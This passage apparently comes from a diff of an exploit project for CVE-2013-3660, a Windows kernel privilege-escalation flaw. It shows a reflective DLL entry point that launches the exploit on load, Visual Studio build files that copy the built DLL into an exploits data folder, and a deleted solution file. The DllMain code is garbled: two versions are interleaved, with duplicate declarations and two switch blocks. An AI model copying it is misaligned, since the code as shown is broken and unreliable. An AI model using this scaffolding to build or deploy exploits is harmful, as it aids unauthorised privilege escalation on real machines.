//fflush(stdout);
//flush(stderr);
return TRUE;
}
extern HINSTANCE hAppInstance;
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
#else
#define LogMessage(...)
#endif
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
hAppInstance = hinstDLL;
elevator_complex_path();
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
BOOL bReturnValue = TRUE;
dprintf("[PPRFLATTENREC] DllMain invoked, reason: %u", dwReason);
switch (dwReason)
{
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
dprintf("[PPRFLATTENREC] Module queried %x", hinstDLL);
if (lpReserved != NULL)
{
*(HMODULE *)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
dprintf("[PPRFLATTENREC] Launching exploit with %p", lpReserved);
elevator_complex_path(lpReserved);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}

View File

@ -0,0 +1,141 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{942BF20A-E438-48B0-A614-A6E0CC2E94BD}</ProjectGuid>
<RootNamespace>ppr_flatten_rec</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\ppr_flatten_rec.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\ppr_flatten_rec.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-3660\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2013-3660\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-3660\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="ppr_flatten_rec.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="ComplexPath.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

View File

@ -0,0 +1,9 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="ppr_flatten_rec.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="ComplexPath.h" />
</ItemGroup>
</Project>

View File

@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual C++ Express 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

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